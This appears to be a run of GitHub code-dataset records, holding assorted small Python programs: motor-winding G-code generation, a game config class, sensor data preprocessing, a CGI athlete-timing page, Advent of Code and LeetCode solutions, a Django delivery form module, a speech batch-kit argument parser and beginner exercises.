turn==numTurns-1:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,nextAngle)\n else:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,nextAngle)\n\n# toXYZ(xStart,z,curAngle)\n# toXYZ(xStart,z+zUpDelta,curAngle)\n# toXYZ(xStart,z+zUpDelta,nextAngle)\n\ndef CCW(pole):\n file.write(\";CCW\\n\") \n curAngle = 360/numStatorPoles*pole\n nextAngle = 360/numStatorPoles*(pole+1)\n for turns in numTurnsPerLayer:\n numTurns = turns[\"numTurns\"]\n xCurStart = turns[\"xStart\"]\n xCurIncr = turns[\"xIncr\"]\n xCurRotComp = turns[\"xRotCompensation\"]\n for turn in range(numTurns):\n toXYZ(xCurStart+xCurIncr*turn,z,nextAngle)\n toXYZ(xCurStart+xCurIncr*turn,z+zUpDelta,nextAngle)\n toXYZ(xCurStart+xCurIncr*turn+xCurRotComp,z+zUpDelta,curAngle)\n if turn==numTurns-1:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,curAngle)\n else:\n toXYZ(xCurStart+xCurIncr*(turn)+xCurRotComp,z,curAngle)\n\n\n# note poles index here starts from 1\nwiringDiagramm = [\n# {\"Order\":\"CW\",\"Pole\":1},\n {\"Order\":\"CCW\",\"Pole\":1},\n {\"Order\":\"CW\",\"Pole\":2},\n {\"Order\":\"CCW\",\"Pole\":3},\n {\"Order\":\"NONE\",\"Pole\":9},\n {\"Order\":\"CCW\",\"Pole\":9},\n {\"Order\":\"CW\",\"Pole\":8},\n {\"Order\":\"CCW\",\"Pole\":7},\n ]\n\nfor pole in wiringDiagramm:\n file.write((\";LAYER:{}\\n\") .format(pole))\n poleIndex = pole[\"Pole\"]-1\n order = pole[\"Order\"]\n if order==\"CW\":\n CW(poleIndex)\n elif order==\"CCW\":\n CCW(poleIndex)\n else:\n curAngle = 360/numStatorPoles*poleIndex\n toXYZ(9,z,None)\n toXYZ(9,z,curAngle)\n toXYZ(0,z,curAngle)\n\ntoXYZ(0,z,None)\n\nfile.close() #to change file access modes ","repo_name":"pavlog/RobotUtils","sub_path":"bldc_wiring.py","file_name":"bldc_wiring.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10274588629","text":"class Matchconfig:\n\n def __init__(self, moledie_range: int, bowlerblade_range: int, bowlerblade_hit_chance: float,\n bowlerblade_damage: int, lasercompact_hit_chance: float, rocketpen_damage: int, gasgloss_damage: int,\n mothballpouch_range: int, mothballpouch_damage: int, fogtin_range: int, grapple_range: int,\n grapple_hit_chance: float,\n wiretapWithEarplugs_fail_chance: float, mirror_swap_chance: float, cocktail_dodge_chance: float,\n cocktail_hp: int,\n spy_success_chance: float, babysitter_success_chance: float, honeytrap_success_chance: float,\n observation_success_chance: float,\n chips_to_ip_factor: int, secret_to_ip_factor: int, min_chips_roulette: int, max_chips_roulette: int,\n round_limit: int, turn_phase_limit: int,\n cat_ip: int, strike_max: int, pause_limit: int, reconnect_limit: int):\n self.moledie_range = moledie_range\n self.bowlerblade_range = bowlerblade_range\n self.bowlerblade_hit_chance = bowlerblade_hit_chance\n self.bowlerblade_damage = bowlerblade_damage\n self.lasercompact_hit_chance = lasercompact_hit_chance\n self.rocketpen_damage = rocketpen_damage\n self.gasgloss_damage = gasgloss_damage\n self.motballpouch_range = mothballpouch_range\n self.mothballpouch_damage = mothballpouch_damage\n self.fogtin_range = fogtin_range\n self.grapple_range = grapple_range\n self.grapple_hit_chance = grapple_hit_chance\n self.wiretapWithEarplugs_fail_chance = wiretapWithEarplugs_fail_chance\n self.mirror_swap_chance = mirror_swap_chance\n self.cocktail_dodge_chance = cocktail_dodge_chance\n self.cocktail_hp = cocktail_hp\n self.spy_success_chance = spy_success_chance\n self.babysitter_success_chance = babysitter_success_chance\n self.honeytrap_success_chance = honeytrap_success_chance\n self.observation_success_chance = observation_success_chance\n self.chips_to_ip_factor = chips_to_ip_factor\n self.secret_to_ip_factor = secret_to_ip_factor\n self.min_chips_roulette = min_chips_roulette\n self.max_chips_roulette = max_chips_roulette\n self.round_limit = round_limit\n self.turn_phase_limit = turn_phase_limit\n self.cat_ip = cat_ip\n self.strike_max = strike_max\n self.pause_limit = pause_limit\n self.reconnect_limit = reconnect_limit\n","repo_name":"masirt/uulm-softwareproject","sub_path":"dummy-ai-client/NetworkStandard/DataTypes/Matchconfig/matchconfig.py","file_name":"matchconfig.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1757230962","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nimport numpy as np\nimport scipy.stats as stats\n\n\ndef load(Filepath=None, Name='N/A', Activity='N/A'):\n if Filepath is not None:\n\n data = pd.read_csv(str(Filepath), sep =\"\\s+\", header=None)\n data.columns = ['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance',\n 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger']\n data['Name'] = str(Name)\n data['Activity'] = str(Activity)\n data['left_fsr_reading_mv'] = pd.to_numeric(data['left_fsr_reading_mv'], downcast=\"float\")\n data['right_fsr_reading_mv'] = pd.to_numeric(data['right_fsr_reading_mv'], downcast=\"float\")\n data['hip_distance'] = pd.to_numeric(data['hip_distance'], downcast=\"float\")\n else:\n data = pd.DataFrame()\n data.columns = ['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance',\n 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger']\n # Trick to make name and activity values NaN\n data['Name'] = pd.to_numeric(data['Name'], errors='coerce')\n data['Activity'] = pd.to_numeric(data['Activity'], errors='coerce')\n data['left_fsr_reading_mv'] = pd.to_numeric(data['left_fsr_reading_mv'], downcast=\"float\")\n data['right_fsr_reading_mv'] = pd.to_numeric(data['right_fsr_reading_mv'], downcast=\"float\")\n data['hip_distance'] = pd.to_numeric(data['hip_distance'], downcast=\"float\")\n return data\n\ndef combine_and_index(data_stand, data_sit, data_walk):\n data = data_stand.append(data_sit)\n data = data.append(data_walk)\n data.set_index(\n ['time_stamp', 'left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance', 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger', 'Name', 'Activity'])\n data.dropna(axis=0)\n data = data[(data.left_fsr_reading_mv != 0) & (data.right_fsr_reading_mv != 0) & (data.hip_distance != 0)]\n print(\"Initial data clean result: \", data.head())\n return data\n\ndef new_train_data_merge(train_cleaned_data):\n with open('/Users/stankusnt/Desktop/Work/StrideTech AI Test/Model_training/initial_data_cleaned.csv', 'a') as f:\n (train_cleaned_data).to_csv(f, header=False, index=False)\n\ndef balance_data(data):\n walking_data_length = len(data[data['Activity'] == 'Walking'])\n sitting_data_length = len(data[data['Activity'] == 'Sitting'])\n standing_data_length = len(data[data['Activity'] == 'Standing'])\n\n truncate_count = min(walking_data_length, sitting_data_length, standing_data_length)\n\n #shrink data so same # of rows\n\n walking = data[data['Activity'] == 'Walking'].head(truncate_count)\n sitting = data[data['Activity'] == 'Sitting'].head(truncate_count)\n standing = data[data['Activity'] == 'Standing']\n\n balanced_data = pd.concat([walking, sitting, standing])\n\n balanced_data = balanced_data.drop(['time_stamp', 'left_vibration_trigger', 'right_vibration_trigger', 'hip_vibration_trigger', 'Name'], axis = 1)\n\n # Set labels\n label = LabelEncoder()\n balanced_data['label'] = label.fit_transform(balanced_data['Activity'])\n print(\"Balanced data result: \", balanced_data.describe())\n return balanced_data, label\n\ndef standardize_data(balanced_data):\n X = balanced_data[['left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance']] # input variables\n Y = balanced_data[['label']] # output\n scaler = StandardScaler()\n X = scaler.fit_transform(X)\n\n scaled_X = pd.DataFrame(data=X, columns=['left_fsr_reading_mv', 'right_fsr_reading_mv', 'hip_distance'])\n scaled_X['label'] = Y.values\n print(\"Scaled X description: \" + str(scaled_X.describe()))\n return scaled_X, Y\n\ndef get_frames(data, Fs=1, frame_size=None, hop_size=None, N_FEATURES=3):\n if frame_size is None:\n frame_size=Fs*2\n if hop_size is None:\n hop_size=Fs*1\n frames = []\n labels = []\n for i in range(0, len(data) - frame_size, hop_size):\n left_fsr_reading_mv = data['left_fsr_reading_mv'].values[i: i + frame_size]\n right_fsr_reading_mv = data['right_fsr_reading_mv'].values[i: i + frame_size]\n hip_distance = data['hip_distance'].values[i: i + frame_size]\n\n # Retrieve the most frequently used label in this segment\n label = stats.mode(data['label'][i: i + frame_size])[0][\n 0] # array within an array returned, and only 1, but still have to reference the index\n frames.append([left_fsr_reading_mv, right_fsr_reading_mv, hip_distance])\n labels.append(label)\n\n # Bring segments into new and improved shape\n frames = np.asarray(frames).reshape(-1, frame_size, N_FEATURES) # reformat into vector\n labels = np.asarray(labels)\n print(\"Frames sample: \" + str(frames[:2,:2]))\n print(\"Labels sample: \" + str(labels[:2]))\n return frames, labels\n\ndef reshape(X):\n X_dim1, X_dim2, X_dim3 = X.shape\n\n # Make 3D Model\n X = X.reshape(X_dim1, X_dim2, X_dim3, 1)\n print(\"Input shape is: \", X[5].shape)\n return X\n\n","repo_name":"stankusnt97/StrideTech-AI-Deploy","sub_path":"Functions/_data_preprocessing.py","file_name":"_data_preprocessing.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4159339088","text":"number = int(input())\r\npower = 1\r\ntemp = number ** power #the number that is saved if it is right, start from 2\r\nfinished = False\r\n\r\nwhile(not finished): #not finished = True to run\r\n for i in [1,2,3,4,5,6,7,8,9,0]:\r\n if str(i) in str(temp) and count == 9:\r\n finished = True\r\n print(power)\r\n\r\n elif str(i) in str(temp) and count != 9:\r\n count += 1\r\n \r\n elif str(i) not in str(temp):\r\n power += 1\r\n temp = number**power\r\n print(temp)\r\n count = 0 \r\n continue\r\n\r\n","repo_name":"alwinchoi/Math-problem-","sub_path":"part a of the problem.py","file_name":"part a of the problem.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26028979998","text":"#! /usr/bin/python3\n\nimport cgi\n\nimport cgitb\ncgitb.enable()\n\nimport kelly6\nimport yate\nimport glob\n\ndata_files = glob.glob(\"data/*.txt\")\nathletes = kelly6.loadfiles(data_files)\n\nform_data = cgi.FieldStorage()\nathlete_name = form_data['which_athlete'].value\n\nathlete = None\n\nfor each_athlete in athletes:\n\tif each_athlete.name == athlete_name:\n\t\tathlete = each_athlete\n\telse:\n\t\tpass\n\nprint(yate.start_response())\nprint(yate.include_header(\"Coach Kelly's Timing Data\")) \nprint(yate.header(\"Athlete: \" + athlete_name + \", DOB: \" +\n athlete.birthdate + \".\"))\nprint(yate.para(\"The top times for this athlete are:\"))\nprint(yate.u_list(athlete.top3()))\nprint(yate.include_footer({\"Home\": \"/index.html\",\n \"Select another athlete\": \"generate_list.py\"}))\n\n","repo_name":"hehahovip/firstpython","sub_path":"chapter8/webapp/cgi-bin/generate_timing_data.py","file_name":"generate_timing_data.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42331512485","text":"\"\"\"\nAdvent of Code 2019 - Day 1\n\nThis program will read in data from a .dat file, run the desired calculation \nand sum the results\n\nThen the exrta fuel mass will be added to them results, and the process\nwill be rpeated\n\nAuthor: Tom Kite\n\"\"\"\n\nimport numpy as np\n\ndef calc_101(x):\n output = np.floor(x/3) - 2\n return output\n\ndef new_fuel_mass(current_masses):\n return sum(calc_101(current_masses))\n\ndef main_loop():\n \n # Main variables \n file_name = \"101.dat\"\n raw_data = np.array([])\n \n # Check file open\n try:\n input_file = open(file_name,'r')\n except:\n print(\"File couldn't be opened!\")\n return\n \n # Read in raw data, casting to float\n for line in input_file:\n raw_data = np.append( raw_data, float(line) )\n \n # Close input file \n input_file.close()\n \n total_fuel_per_module = np.array([])\n \n for module_mass in raw_data:\n \n fuel_masses = np.array( [calc_101(module_mass)] )\n \n while ( calc_101(fuel_masses[-1]) > 0):\n fuel_masses = np.append( fuel_masses, calc_101(fuel_masses[-1]) )\n \n total_fuel_per_module = np.append( total_fuel_per_module, sum(fuel_masses) )\n \n print( sum(total_fuel_per_module) )\n \nmain_loop()","repo_name":"TomKite57/advent_of_code_2019","sub_path":"102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34932169749","text":"#!/usr/bin/python3\n\n\"\"\"\nImport Required Libraries\n\"\"\"\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\n\n\"\"\"\nInitialize Variables.\n\"\"\"\nletterA = []\nletterC = []\nfilename = \"histogram.txt\"\n\n\"\"\"\nOpen Histogram File And Build\nLists Used To Graph.\n\"\"\"\nwith open(filename,'r') as f:\n for line in f:\n a = line.split(':')\n letterA.append(a[0])\n letterC.append(int(a[1]))\n\n\"\"\"\nPlot Histogram & Save Plot To File.\nFile Is Date And Time Stamped.\n\"\"\"\nfigname = \"saved_figs/cryptograph_{0}.jpg\".format(datetime.now().strftime(\"%Y%m%d_%H%M%S\"))\nfig = plt.figure()\nplt.bar(letterA,letterC)\nplt.xlabel(\"Letters\")\nplt.ylabel(\"Count\")\ntry:\n plt.savefig(figname)\n print(\"[+] Histogram Saved To {0}\".format(figname))\nexcept:\n print(\"[!] Unable To Save Figure\")\nplt.show()\n\n","repo_name":"thomas-osgood/CypherCrack","sub_path":"graphHist.py","file_name":"graphHist.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17280443634","text":"\"\"\"\nQuestion:\nGiven the root of a binary tree, return the maximum width of the given tree.\n\nThe maximum width of a tree is the maximum width among all levels.\n\nThe width of one level is defined as the length between the end-nodes (the leftmost and rightmost non-null nodes), where the null nodes between the end-nodes that would be present in a complete binary tree extending down to that level are also counted into the length calculation.\n\nIt is guaranteed that the answer will in the range of a 32-bit signed integer.\n\nSoln:\nbfs search adn get max width for each layer\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def widthOfBinaryTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n from collections import deque\n queue = deque([[root, 1]])\n ans = 0\n while queue:\n left = right = None\n for _ in range(len(queue)):\n node, idx = queue.popleft()\n if not left:\n left = idx\n if left:\n right = idx\n if node.left:\n queue.append((node.left, idx*2-1))\n if node.right:\n queue.append((node.right, idx*2))\n ans = max(ans, right - left+1)\n return ans\n","repo_name":"GaaryApple/MyLeetcode","sub_path":"662_Maximum_Width_of_Binary_Tree/662_Maximum_Width_of_Binary_Tree.py","file_name":"662_Maximum_Width_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"593822099","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n\ntest = int(input())\n\nfor _ in range(test):\n input()\n lst = list(map(int, input().split()))\n l = len(lst)\n i = 0\n while i < l-1 and lst[i] >= lst[i+1]:\n i = i + 1\n while i < l-1 and lst[i] <= lst[i+1]:\n i = i + 1\n if i == l-1:\n print(\"Yes\")\n else:\n print(\"No\")","repo_name":"Vivekagent47/HackerRank","sub_path":"Python/63.py","file_name":"63.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18169187355","text":"import re\n\n## Django imports\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.db.models import Count\nfrom django.forms.models import ModelChoiceField\n\n## MAGE imports\nfrom scm.models import Delivery, LogicalComponentVersion, InstallableItem, ItemDependency, InstallationMethod\nfrom ref.models import LogicalComponent\nfrom ref.widgets import ClearableFileInputPretty\n\nclass DeliveryForm(ModelForm):\n def clean_ticket_list(self):\n data = self.cleaned_data['ticket_list']\n if not data:\n return data\n p = re.compile('([\\da-zA-Z_-]+,?)+$')\n if p.match(data) is None:\n raise forms.ValidationError(\"This field must be a comma-separated list of ticket ID (letters and integers)\")\n return data\n\n class Meta:\n model = Delivery\n exclude = ['removed', 'status', ]\n widgets = { 'datafile': ClearableFileInputPretty}\n\nclass LcChoiceField(ModelChoiceField):\n def label_from_instance(self, obj):\n return \"%s - %s\" % (obj.application.name, obj.name)\n\nclass IIForm(ModelForm):\n target = LcChoiceField(queryset=LogicalComponent.objects.filter(implemented_by__installation_methods__restoration_only = False, implemented_by__installation_methods__available = True).annotate(num_methods=Count('implemented_by__installation_methods')).filter(scm_trackable=True).filter(num_methods__gt = 0).order_by('application__name', 'name'), label='Composant livré')\n version = forms.CharField(label='Version livrée')\n\n def save(self, commit=True):\n logicalcompo = self.cleaned_data['target']\n version = self.cleaned_data['version']\n v = LogicalComponentVersion.objects.get_or_create(logical_component=logicalcompo, version=version)[0]\n v.save()\n self.instance.what_is_installed = v\n o = super(IIForm, self).save(commit)\n return o\n\n def clean_how_to_install(self):\n data = self.cleaned_data['how_to_install']\n deleted = 'DELETE' in self.cleaned_data if 'DELETE'in self.cleaned_data else False\n if len(data) == 0 and not deleted:\n raise forms.ValidationError(\"At least one technical target is required\")\n return data\n\n def clean_datafile(self):\n dfile = self.cleaned_data['datafile']\n try:\n target = self.cleaned_data['target']\n except KeyError:\n return dfile\n methods = self.cleaned_data['how_to_install']\n\n if len(methods) == 0:\n return dfile\n for method in methods:\n if method.checkers.count() > 0 and (dfile is None or dfile == False):\n raise forms.ValidationError('A datafile is required')\n if dfile == False: ## Cleared file\n return dfile\n\n for method in methods:\n method.check_package(dfile, target)\n return dfile\n\n def clean(self):\n cleaned_data = super(IIForm, self).clean()\n\n ## Check how_to_install consistency\n if 'target' in self.cleaned_data and 'how_to_install' in self.cleaned_data:\n logicalcompo = self.cleaned_data['target']\n htis = self.cleaned_data['how_to_install']\n for hti in htis:\n if not logicalcompo in [i.implements for i in hti.method_compatible_with.all()]:\n raise forms.ValidationError(\"Inconsistent choice - that method is not compatible with this target\")\n\n ## Check datafile according to hpow_to_install\n ##self.clean_datafile2()\n\n ## Done\n return cleaned_data\n\n def __init__(self, project, *args, **kwargs):\n super(IIForm, self).__init__(*args, **kwargs)\n self.fields['how_to_install'].queryset = InstallationMethod.objects.filter(restoration_only=False)\n\n if 'application' in kwargs:\n self.fields['target'].queryset = self.fields['target'].queryset.filter(application=kwargs['application'])\n kwargs.remove('application')\n self.fields['target'].queryset = self.fields['target'].queryset.filter(application__project=project)\n\n if self.instance != None and self.instance.pk is not None:\n self.initial['target'] = self.instance.what_is_installed.logical_component.pk\n self.initial['version'] = self.instance.what_is_installed.version\n\n class Meta:\n model = InstallableItem\n # exclude = ['what_is_installed',]\n fields = ('target', 'version', 'how_to_install', 'is_full', 'data_loss', 'datafile') # 'what_is_installed')\n widgets = { 'datafile': ClearableFileInputPretty}\n\n\nclass IDForm(ModelForm):\n #target = LcChoiceField(queryset=LogicalComponent.objects.filter(scm_trackable=True, implemented_by__installation_methods__isnull=False).distinct().order_by('application__name', 'name'), label='dépend de ', required=False)\n target = LcChoiceField(queryset=LogicalComponent.objects.all())\n # TODO: make query right\n\n class Meta:\n model = ItemDependency\n fields = ('target', 'depends_on_version', 'operator',)\n\n def __init__(self, project, *args, **kwargs):\n super(IDForm, self).__init__(*args, **kwargs)\n \n self.fields['target'].queryset = self.fields['target'].queryset.filter(application__project=project)\n","repo_name":"marcanpilami/MAGE","sub_path":"scm/views/delivery_handoff_forms.py","file_name":"delivery_handoff_forms.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28360776904","text":"import argparse\nfrom argparse import Namespace\nimport tempfile\n\n\ndef check_positive(value):\n \"\"\"\n Ensure an argument is positive integer\n :param value: argument to check\n :return: integer cast of the passed in value\n \"\"\"\n int_value = int(value)\n if int_value <= 0:\n raise argparse.ArgumentTypeError(\"{0} is not a positive int value\".format(value))\n return int_value\n\n\ndef create_parser():\n parser = argparse.ArgumentParser(\n description='Run a Speech SDK batch client for batch transcription of audio files',\n add_help=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-config', '--configuration-file',\n default=\"/usr/local/batch/input/config.yaml\",\n help='configuration file holding the information about endpoints, ports and concurrency'\n )\n parser.add_argument(\n '-output_folder', '--output-folder',\n default=\"/usr/local/batch/output\",\n help='Folder to store transcriptions and logs. Use with --run-mode ONESHOT or DAEMON.'\n )\n parser.add_argument(\n '-input_folder', '--input-folder',\n default=\"/usr/local/batch/input\",\n help=\"Folder where audio files are stored. Use with --run-mode ONESHOT or DAEMON.\"\n )\n parser.add_argument(\n '-log_folder', '--log-folder',\n default=None,\n help=\"Folder where logs are stored. If not provided, logs will not be written to file.\"\n )\n parser.add_argument(\n '-console_log_level', '--console-log-level',\n choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n default='INFO', help=\"Set the console logging level\"\n )\n parser.add_argument(\n '-file_log_level', '--file-log-level',\n choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n default='INFO', help=\"Set the file logging level\"\n )\n parser.add_argument(\n '-nbest', '--nbest',\n default=1, type=check_positive,\n help=\"How many maximum results to consider per recognition\"\n )\n parser.add_argument(\n '-combined_json', '--store-combined-json',\n default=False, action='store_true',\n help=\"whether to also produce a combined JSON result for the entire run\"\n )\n parser.add_argument(\n '-input_list', '--input-list',\n help=\"File containing list of audio files to process. If not provided all files in \"\n \"the input folder are considered. Use with --run-mode ONESHOT only.\"\n )\n parser.add_argument(\n '-m', '--run-mode',\n default='ONESHOT', choices=['ONESHOT', 'DAEMON', 'APISERVER'],\n help=\"whether to run in a daemon mode listening to more changes in the input folder\"\n )\n parser.add_argument(\n '-scratch_folder', '--scratch-folder',\n required=False,\n help=\"[Optional] Scratch folder will be created if it doesn't\"\n \"exist and is cleaned on exit. If unspecified, a temporary\"\n \"directory is used under /tmp\"\n )\n parser.add_argument(\n '-diarization', '--diarization-mode',\n default='None', choices=['None', 'Identity', 'Anonymous'],\n help=\"diarization mode selection\"\n )\n parser.add_argument(\n '-language', '--language', nargs='+', default=\"en-US\",\n help=\"Space-separated list of candidate languages for transcription.\\n\"\n \" Example: --language en-US \\n\"\n \" Example: --language en-US fr-FR de-DE \\n\"\n \"If exactly one language is provided, no language segmentation is performed and you do not need \"\n \"Language Identification (LID) endpoints in your config. With two or more languages, you must have at \"\n \"least one LID endpoint listed in your config available for multi-language segmentation to run first. \"\n \"Each LID endpoint should be marked with language 'lid' in the endpoint config.\"\n )\n parser.add_argument(\n '-strict_config', '--strict-configuration-validation',\n default=False, action='store_true',\n help=\"whether to fail an invalid configuration file\"\n )\n parser.add_argument(\n '-profanity', '--profanity-mode',\n default='Masked', choices=['Masked', 'Raw', 'Removed'],\n help=\"how to handle profanity in the response\"\n )\n parser.add_argument(\n '-sentiment', '--enable-sentiment', default=False, action='store_true',\n help=\"Enable sentiment analysis\"\n )\n parser.add_argument(\n '-resume', '--allow-resume', default=False, action='store_true',\n help=\"whether to allow resuming from a failed transcription (WARNING: results may differ)\"\n )\n parser.add_argument(\n '-port', '--apiserver_port', default=5000, type=check_positive,\n help=\"Port for listening when using APISERVER mode\"\n )\n parser.add_argument(\n '-poll', '--poll', default=False, action='store_true',\n help=\"In DAEMON mode, toggle to periodically poll the input directory for new files instead of relying \"\n \"only on the Posix Watches facility. This is needed to make DAEMON mode work with filesystems that \"\n \"do not support Posix Watches, for example CIFS mount. Polling is an increased burden on the filesystem. \"\n \"Applies to --run-mode DAEMON only.\"\n )\n parser.add_argument(\n '-max_segment_length', '--max-segment-length',\n default=3600, type=check_positive,\n help=\"[Applies when multiple --language given only].\"\n \"Cap the maximum audio segment length produced during language segmentation. \"\n \"Longer segments will be broken up into smaller ones. Unit: positive integer seconds.\"\n )\n parser.add_argument(\n '-debug_loop_interval', '--debug-loop-interval',\n default=0, type=check_positive,\n help=\"Interval in seconds to re-log debug information about the batchkit's orchestration components. \"\n \"Useful for debugging. The default value of 0 means this information is not logged. \"\n )\n return parser\n\n\ndef parse_cmdline(args=None) -> Namespace:\n \"\"\"\n Create a command line parser for the batch client, and parse arguments\n :param args: arguments to parse\n :return: parsed command line arguments\n \"\"\"\n parser = create_parser()\n args: Namespace = parser.parse_args(args=args)\n\n if args.input_list is not None and args.run_mode != 'ONESHOT':\n parser.error(\"argument -input_list/--input-list: not allowed if the run mode is not ONESHOT\")\n\n if args.scratch_folder is None:\n args.scratch_folder = tempfile.mkdtemp()\n\n if isinstance(args.language, list) and len(args.language) > 1 and args.run_mode != 'ONESHOT':\n parser.error(\"Multi-language speech-batch-kit can only be used in ONESHOT mode in this version.\")\n\n if isinstance(args.language, str):\n args.language = [args.language]\n\n return args\n","repo_name":"microsoft/batch-processing-kit","sub_path":"batchkit_examples/speech_sdk/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"72553962152","text":"import sys, heapq\n\nV, E = map(int,input().split())\n\nK = int(input())\n\ngraph = [[] for y in range(V + 1)]\n\nINF = int(1e9)\nfor _ in range(E):\n u, v, w = map(int, sys.stdin.readline().rstrip().split())\n graph[u].append((v,w)) #u에서 v까지 갈때 걸리는 비용 w\n\n#print(graph)\n\nD = [INF] * (V + 1)\n\ndef dijkstra(start):\n qq = []\n heapq.heappush(qq,(0,start)) #(거리, 시작점) 자기자신은 거리가 0\n\n while qq:\n dist, now = heapq.heappop(qq)\n if D[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < D[i[0]]:\n D[i[0]] = cost\n heapq.heappush(qq, (cost,i[0]))\n\ndijkstra(K)","repo_name":"jayyeong/Algorithm","sub_path":"메모장/다익스트라 복습.py","file_name":"다익스트라 복습.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17330848767","text":"from os.path import dirname\n\n####################################################\n######## global configs #########\n####################################################\n\nnaming_scheme = 's2m2rf'\nmain_acc = 'test_acc'\nfirth_reg_col = 'firth_coeff'\nPROJPATH = f'{dirname(dirname(__file__))}'\nsmry_tbls_dir = f'{PROJPATH}/summary'\npaper_tbls_dir = f'{PROJPATH}/tables'\n\n####################################################\n######## csv2summ configs #########\n####################################################\n\nreg_sources = ['test']\nsumm_cond_vars = ['source_dataset', 'target_dataset', 'n_ways', 'n_shots', 'n_aug']\nresults_csv_dir = f'{PROJPATH}/results'\n# generating the path to the files to be read\n# provided by a seperate .py file\nspecific_csv_fldrs = ['1_mini2CUB', '2_tiered2CUB', '3_tiered2tiered', '4_5ways']\ndeprecated_cols = []\nprop_cols = ['n_shots', 'n_ways', 'source_dataset', 'target_dataset',\n 'backbone_method', 'backbone_arch', 'split']\nprop_cols = prop_cols + deprecated_cols\ncrn_cols = ['rng_seed', 'task_id']\ndfltvals_dict = dict()\n\n####################################################\n######## summ2tables configs #########\n####################################################\n\ntable_sep_cols = ['target_dataset', 'source_dataset', 'n_ways', 'n_shots']\nrow_tree = [\"n_ways\", \"n_shots\"]\ncol_tree = [\"source2target\", \"print_name\"]\n\nscale_percent = 100\n","repo_name":"ehsansaleh/code_dcf","sub_path":"utils/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70428829353","text":"from PythonFile import Frog\n\nclass Log(Frog):\n\n\tdef __init__(self,num,isActive):\n\t\tsuper().__init__(1)\n\t\tself.isActive = isActive\n\n\tdef get_isActive(self):\n\t\treturn self.isActive\n\nl = Log(1,True)\nl.addOne()\nprint(l.get_isActive())","repo_name":"Mallet1/PreGithub_11-24-2021","sub_path":"PythonLearning/Python OOP - Unfinished/Inheritance Across Files.py","file_name":"Inheritance Across Files.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578894665","text":"'''\r\n제어문 : 반복문(while)\r\n\r\nwhile 조건식 :\r\n 실행문\r\n 실행문\r\n'''\r\n\r\n\r\n# 카운터, 누적 변수\r\ncnt = tot = 0 # 변수 초기화\r\n\r\nwhile cnt < 5 :\r\n cnt += 1 # 카운터 변수\r\n tot += cnt # 누적 변수\r\n print(cnt, tot, end=\" / \")\r\n# 1 1 / 2 3 / 3 6 / 4 10 / 5 15 /\r\n\r\nwhile cnt < 5 : # True -> Loop(명령문 집합) 실행\r\n pass # 아무것도 하지않는다.\r\n break\r\n\r\n# ex1) 1 ~ 100 까지 합 출력하기\r\ncnt = tot = 0\r\nwhile cnt < 100 :\r\n cnt += 1\r\n tot += cnt\r\nprint(\"1~100까지 합 : %d\"%(tot)) # 1~100까지 합 : 5050\r\nprint(\"1~100까지 합 :\", tot)\r\n\r\n# ex2) 1 ~ 100 까지 짝수 출력\r\ncnt = 0\r\ndata = [] # 빈 list(짝수 저장)\r\nwhile cnt < 100 :\r\n cnt += 1\r\n if cnt % 2 == 0 :\r\n data.append(cnt) # 짝수 